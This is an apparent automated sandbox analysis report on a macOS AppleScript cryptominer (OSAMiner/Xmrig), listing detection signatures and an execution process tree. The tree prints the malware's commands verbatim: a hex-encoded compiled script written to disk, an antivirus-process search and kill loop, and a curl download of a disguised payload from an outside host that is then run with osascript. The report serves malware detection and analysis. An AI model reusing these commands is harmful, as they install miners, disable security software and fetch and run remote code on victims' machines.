Loading ...

Play interactive tourEdit tour

Analysis Report gqnmir4Hus

Overview

General Information

Sample Name:gqnmir4Hus
Analysis ID:1344210
MD5:831c1ec1b594ace3c97787b077ba9dac
SHA1:93b2653a4259d9c04e5b780762dc4abc40c49d35
SHA256:df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8

Most interesting Screenshot:

Detection

OSAMiner Xmrig
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Yara detected OSAMiner
Yara detected Xmrig cryptocurrency miner
Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping indicative for miners
Found strings related to Crypto-Mining
Process executable has a file extension which is uncommon (probably to disguise the executable)
Scans the system for common Anti-Virus software
Writes compiled Apple script to disk (with potentially malicious intention)
Written Apple script contain uncommon file extension (probably to disguise the script)
Copies directory hierarchies, creates and/or extracts archives with shell command 'ditto'
Detected TCP or UDP traffic on non-standard ports
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "mkdir" command used to create folders
Executes the "pgrep" command search for and/or send signals to processes
Executes the "ping" command used for connectivity testing via ICMP
Executes the "ps" command used to list the status of processes
Executes the "rm" command used to delete files or directories
Executes the "system_profiler" command used to collect detailed system hardware and software information
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl hardware model value (might be used for detecting VM presence)
Reads the systems hostname
Sample tries to kill a process (SIGKILL)
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes ZIP files to disk

Classification

Startup

  • System is mac1
  • sudo (MD5: 60ac5909d06d86e22aace3a863b13690) Arguments:
    • sudo New Fork (PID: 548, Parent: 547)
    • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Desktop/gqnmir4Hus.scpt
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c printf '%b' '\x46\x61\x73\x64\x55\x41\x53\x20\x31\x2E\x31\x30\x31\x2E\x31\x30\x0E\x00\x00\x00\x04\x0F\xFF\xFF\xFF\xFE\x00\x01\x00\x02\x01\xFF\xFF\x00\x00\x01\xFF\xFE\x00\x00\x0E\x00\x01\x00\x00\x0F\x10\x00\x02\x00\x06\xFF\xFD\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x01\xFF\xFD\x00\x00\x10\x00\x03\x00\x04\xFF\xFC\xFF\xFB\xFF\xFA\xFF\xF9\x0B\xFF\xFC\x00\x05\x30\x00\x01\x65\x00\x00\x0B\xFF\xFB\x00\x05\x30\x00\x01\x64\x00\x00\x0B\xFF\xFA\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x0A\xFF\xF9\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x0E\x00\x04\x00\x07\x10\xFF\xF8\xFF\xF7\xFF\xF6\xFF\xF5\x00\x08\x00\x09\xFF\xF4\x0B\xFF\xF8\x00\x05\x30\x00\x01\x65\x00\x00\x01\xFF\xF7\x00\x00\x0E\xFF\xF6\x00\x02\x04\xFF\xF3\x00\x0A\x03\xFF\xF3\x00\x01\x0E\x00\x0A\x00\x01\x00\xFF\xF2\x0B\xFF\xF2\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xF5\x00\x00\x10\x00\x08\x00\x03\xFF\xF1\xFF\xF0\xFF\xEF\x0B\xFF\xF1\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xF0\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xEF\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x09\x00\x08\xFF\xEE\xFF\xED\xFF\xEC\xFF\xEB\xFF\xEA\xFF\xE9\xFF\xE8\xFF\xE7\x0A\xFF\xEE\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xED\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xEC\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xEB\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xEA\x00\x64\x0A\xFF\xE9\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xE8\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xE7\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xF4\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1E\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x05\x00\x07\x10\xFF\xE6\xFF\xE5\xFF\xE4\xFF\xE3\x00\x0B\x00\x0C\xFF\xE2\x0B\xFF\xE6\x00\x05\x30\x00\x01\x64\x00\x00\x01\xFF\xE5\x00\x00\x0E\xFF\xE4\x00\x02\x04\xFF\xE1\x00\x0D\x03\xFF\xE1\x00\x01\x0E\x00\x0D\x00\x01\x00\xFF\xE0\x0B\xFF\xE0\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xE3\x00\x00\x10\x00\x0B\x00\x03\xFF\xDF\xFF\xDE\xFF\xDD\x0B\xFF\xDF\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xDE\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xDD\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x0C\x00\x08\xFF\xDC\xFF\xDB\xFF\xDA\xFF\xD9\xFF\xD8\xFF\xD7\xFF\xD6\xFF\xD5\x0A\xFF\xDC\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xDB\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xDA\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xD9\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xD8\x00\x64\x0A\xFF\xD7\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xD6\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xD5\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xE2\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1F\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x06\x00\x07\x10\xFF\xD4\xFF\xD3\xFF\xD2\xFF\xD1\x00\x0E\x00\x0F\xFF\xD0\x0B\xFF\xD4\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xD3\x00\x00\x0E\xFF\xD2\x00\x02\x04\xFF\xCF\x00\x10\x03\xFF\xCF\x00\x01\x0E\x00\x10\x00\x01\x00\xFF\xCE\x0B\xFF\xCE\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x02\xFF\xD1\x00\x00\x10\x00\x0E\x00\x02\xFF\xCD\xFF\xCC\x0B\xFF\xCD\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x0B\xFF\xCC\x00\x07\x30\x00\x03\x5F\x69\x64\x00\x00\x10\x00\x0F\x00\x08\x00\x11\xFF\xCB\x00\x12\xFF\xCA\x00\x13\x00\x14\xFF\xC9\xFF\xC8\x0E\x00\x11\x00\x01\xB1\x00\x15\x11\x00\x15\x00\x1A\x00\x70\x00\x73\x00\x20\x00\x61\x00\x78\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x0A\xFF\xCB\x00\x04\x0A\x73\x74\x72\x71\x0E\x00\x12\x00\x01\xB1\x00\x16\x11\x00\x16\x00\x44\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x2D\x00\x76\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x7C\x00\x20\x00\x61\x00\x77\x00\x6B\x00\x20\x00\x27\x00\x7B\x00\x70\x00\x72\x00\x69\x00\x6E\x00\x74\x00\x20\x00\x24\x00\x31\x00\x7D\x00\x27\x0A\xFF\xCA\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0E\x00\x13\x00\x01\xB1\x00\x17\x11\x00\x17\x00\x00\x0E\x00\x14\x00\x01\xB1\x00\x18\x11\x00\x18\x00\x10\x00\x6B\x00\x69\x00\x6C\x00\x6C\x00\x20\x00\x2D\x00\x39\x00\x20\x01\xFF\xC9\x00\x00\x02\xFF\xC8\x00\x00\x11\xFF\xD0\x00\x2C\x14\x00\x24\xE0\xA0\xE1\x2C\x25\xE2\x25\x6A\x0C\x00\x03\x45\xB1\x4F\xA1\xE4\x01\x1D\x00\x0C\xE5\xA1\x25\x6A\x0C\x00\x03\x59\x00\x03\x68\x57\x00\x08\x58\x00\x06\x00\x07\x68\x0F\x0E\x00\x07\x00\x07\x10\xFF\xC7\xFF\xC6\xFF\xC5\xFF\xC4\x00\x19\x00\x1A\xFF\xC3\x0A\xFF\xC7\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x01\xFF\xC6\x00\x00\x01\xFF\xC5\x00\x00\x02\xFF\xC4\x00\x00\x10\x00\x19\x00\x01\xFF\xC2\x0B\xFF\xC2\x00\x05\x30\x00\x01\x69\x00\x00\x10\x00\x1A\x00\x30\x00\x1B\xFF\xC1\xFF\xC0\x00\x1C\xFF\xBF\x00\x1D\x00\x1E\xFF\xBE\xFF\xBD\xFF\xBC\x00\x1F\xFF\xBB\xFF\xBA\xFF\xB9\xFF\xB8\x00\x20\xFF\xB7\xFF\xB6\xFF\xB5\x00\x21\xFF\xB4\xFF\xB3\xFF\xB2\xFF\xB1\x00\x22\x00\x23\x00\x24\xFF\xB0\xFF\xAF\xFF\xAE\xFF\xAD\xFF\xAC\xFF\xAB\x00\x25\xFF\xAA\xFF\xA9\xFF\xA8\x00\x26\x00\x27\x00\x28\xFF\xA7\x00\x29\x00\x2A\x00\x2B\x00\x2C\x00\x2D\x00\x2E\x00\x2F\x0E\x00\x1B\x00\x01\xB1\x00\x30\x11\x00\x30\x00\x08\x00\x83\x00\x90\x00\x60\x00\x99\x0B\xFF\xC1\x00\x06\x30\x00\x02\x6D\x73\x00\x00\x0B\xFF\xC0\x00\x05\x30\x00\x01\x6E\x00\x00\x08\x00\x1C\x00\x08\x3F\xC9\x99\x99\x99\x99\x99\x9A\x0A\xFF\xBF\x00\x18\x2E\x73\x79\x73\x6F\x64\x65\x6C\x61\x6E\x75\x6C\x6C\xFF\xFF\x80\x00\xFF\xFF\x80\x00\x6E\x6D\x62\x72\x0F\x00\x1D\x01\xD4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x65\x76\x73\x00\x02\x01\x00\x61\x6C\x69\x73\x00\x00\x00\x00\x01\x76\x00\x02\x00\x01\x03\x4D\x41\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCE\xA2\xE5\x88\x48\x2B\x00\x00\x00\x00\x00\x30\x11\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x30\x61\xCC\x08\x6F\x49\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x09\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x00\x10\x00\x08\x00\x00\xCE\xA2\x75\x08\x00\x00\x00\x11\x00\x08\x00\x00\xCC\x07\xFE\xC9\x00\x00\x00\x01\x00\x0C\x00\x00\x00\x30\x00\x00\x00\x2A\x00\x00\x00\x29\x00\x02\x00\x34\x4D\x41\x43\x3A\x53\x79\x73\x74\x65\x6D\x3A\x00\x4C\x69\x62\x72\x61\x72\x79\x3A\x00\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x3A\x00\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x0E\x00\x24\x00\x11\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6D\x00\x20\x00\x45\x00\x76\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x2E\x00\x61\x00\x70\x00\x70\x00\x0F\x00\x08\x00\x03\x00\x4D\x00\x41\x00\x43\x00\x12\x00\x2D\x53\x79\x73\x74\x65\x6D\x2F\x4C\x69\x62\x72\x61\x72\x79\x2F\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x2F\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x13\x00\x01\x2F\x00\xFF\xFF\x00\x00\x0E\x00\x1E\x00\x01\xB1\x00\x31\x11\x00\x31\x00\x20\x00\x41\x00\x63\x00\x74\x00\x69\x00\x76\x00\x69\x00\x74\x00\x79\x00\x20\x00\x4D\x00\x6F\x00\x6E\x00\x69\x00\x74\x00\x6F\x00\x72\x0B\xFF\xBE\x00\x05\x30\x00\x01\x73\x00\x00\x0A\xFF\xBD\x00\x04\x0A\x70\x63\x61\x70\x0A\xFF\xBC\x00\x18\x2E\x63\x6F\x72\x65\x64\x6F\x65\x78\x62\x6F\x6F\x6C\x00\x00\x00\x00\x00\x00\x10\x00\x6F\x62\x6A\x20\x0E\x00\x1F\x00\x01\xB1\x00\x32\x11\x00\x32\x00\x08\x00\x2E\x00\x61\x00\x70\x00\x70\x0B\xFF\xBB\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xBA\x00\x00\x02\xFF\xB9\x00\x00\x03\xFF\xB8\x00\x0A\x0E\x00\x20\x00\x01\xB1\x00\x33\x11\x00\x33\x00\xD4\x00\xD4\x00\xD7\x00\x84\x00\xC5\x00\xDC\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xA9\x00\x84\x00\x8B\x00\x97\x00\x9A\x00\x94\x00\xE0\x00\xAF\x00\xC9\x00\xC9\x00\xD4\x00\xC9\x00\xD6\x00\xE0\x00\xB1\x00\xC5\x00\xC7\x00\xB1\x00\xCB\x00\xD6\x00\xE0\x00\xB0\x00\xC9\x00\xD1\x00\xD3\x00\xD2\x00\xE0\x00\xB1\x00\xC5\x00\xD0\x00\xDB\x00\xC5\x00\xD6\x00\xC9\x00\xE0\x00\xA5\x00\xDA\x00\xC5\x00\xD7\x00\xD8\x00\xE0\x00\xA5\x00\xDA\x00\xCD\x00\xD6\x00\xC5\x00\xE0\x00\xA7\x00\xD0\x00\xC9\x00\xC5\x00\xD2\x00\xB1\x00\xDD\x00\xB1\x00\xC5\x00\xC7\x00\x8B\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xDA\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\xE0\x00\x84\x00\xC5\x00\xDB\x00\xCF\x00\x84\x00\x8B\x00\xDF\x00\xD4\x00\xD6\x00\xCD\x00\xD2\x00\xD8\x00\x84\x00\x88\x00\x95\x00\xE1\x00\x8B\x0B\xFF\xB7\x00\x05\x30\x00\x01\x64\x00\x00\x0A\xFF\xB6\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0B\xFF\xB5\x00\x05\x30\x00\x01\x70\x00\x00\x0E\x00\x21\x00\x01\xB1\x00\x34\x11\x00\x34\x00\x00\x0A\xFF\xB4\x00\x04\x0A\x63\x70\x61\x72\x0A\xFF\xB3\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xB2\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xB1\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x0E\x00\x22\x00\x01\xB1\x00\x35\x11\x00\x35\x00\x10\x00\xCF\x00\xCD\x00\xD0\x00\xD0\x00\x84\x00\x91\x00\x9D\x00\x84\x0E\x00\x23\x00\x01\xB1\x00\x36\x11\x00\x36\x00\x12\x00\x49\x00\x6E\x00\x73\x00\x74\x00\x61\x00\x6C\x00\x6C\x00\x65\x00\x72\x0E\x00\x24\x00\x01\xB1\x00\x37\x11\x00\x37\x00\x28\x00\x93\x00\xDA\x00\xC5\x00\xD6\x00\x93\x00\xD0\x00\xD3\x00\xCB\x00\x93\x00\xCD\x00\xD2\x00\xD7\x00\xD8\x00\xC5\x00\xD0\x00\xD0\x00\x92\x00\xD0\x00\xD3\x00\xCB\x0A\xFF\xB0\
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/k.plist > /dev/null 2> /dev/null &
        • sh New Fork (PID: 551, Parent: 550)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/k.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 588, Parent: 587)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 589, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 590, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 591, Parent: 587)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c kill -9 360
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 598, Parent: 597)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 599, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 600, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 601, Parent: 597)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 604, Parent: 603)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 605, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 606, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 607, Parent: 603)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 609, Parent: 608)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 610, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 611, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 612, Parent: 608)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 615, Parent: 614)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 616, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 617, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 618, Parent: 614)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 620, Parent: 619)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 621, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 622, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 623, Parent: 619)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 626, Parent: 625)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 627, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 628, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 629, Parent: 625)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 631, Parent: 630)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 632, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 633, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 634, Parent: 630)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 637, Parent: 636)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 638, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 639, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 640, Parent: 636)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 642, Parent: 641)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 643, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 644, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 645, Parent: 641)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/k.plist
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/k.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
        • sh New Fork (PID: 554, Parent: 553)
        • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
        • sh New Fork (PID: 555, Parent: 553)
        • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ping -c 1 www.apple.com
      • ping (MD5: d91d8718ec1f2d5bcd4c02e7cad8282a) Arguments: ping -c 1 www.apple.com
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl http://www.budaybu100001.com:8080
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl http://www.budaybu100001.com:8080
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/budaybu.png -o ~/Library/11.png
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.png
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/11.png > /dev/null 2> /dev/null &
        • sh New Fork (PID: 561, Parent: 560)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/11.png
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c df -g / | grep / | grep -v grep | awk '{print $2}'
            • sh New Fork (PID: 563, Parent: 562)
            • df (MD5: 81164469cf7add4a64a67fc25d1f7e8a) Arguments: df -g /
            • sh New Fork (PID: 564, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep /
            • sh New Fork (PID: 565, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 566, Parent: 562)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $2}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -d &> /dev/null & echo $!
            • sh New Fork (PID: 568, Parent: 567)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -d
